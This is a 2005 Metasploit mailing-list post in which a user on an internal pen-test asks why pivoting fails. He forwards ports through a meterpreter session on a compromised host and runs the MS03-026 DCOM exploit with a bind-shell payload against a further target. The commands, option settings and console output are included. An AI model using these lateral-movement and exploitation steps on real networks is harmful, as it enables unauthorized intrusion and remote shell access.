Metasploit mailing list archives

use of meterpreter


From: thomas.werth at vahle.de (Thomas Werth)
Date: Thu, 14 Apr 2005 09:10:12 +0200

hello,

I need some info on how to use meterpreter so a victim host can be used as
a "proxy". I already read the meterpreter PDF documentation.
I'm doing a pen-test in my own company intranet and have to find out "what
is possible". I want to use a victim host as a proxy for further attacks in
the intranet.

So here's what I'm doing:
1. Exploited the "proxy victim" with metasploit's meterpreter payload.
2. In the meterpreter "shell" I'm adding some portfwds like this:
- portfwd -a -l 9500 -h 'nextTargetIP' -p 135
- portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P // -P is just another
test in hope it will work this time ...
3. Now I'm using the msrpc exploit with the win32_bind payload,
setting options to:

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default        Description
  --------    ------    -----------    ------------------
  required    RHOST     'ProxyHost'    The target address
  required    RPORT     9500           The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

4. Now launching the exploit

msf msrpc_dcom_ms03_026(win32_bind) > exploit

5. That's where it hangs:

[*] Starting Bind Handler.
[*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444

6. Waited long enough, killed the connection with Ctrl-C

Caught interrupt, exit connection? [y/n] y
[*] Exiting Bind Handler.

What am I doing wrong, or isn't it possible to use portfwd so attacks
can be redirected through a proxy?

greets
Thomas Werth
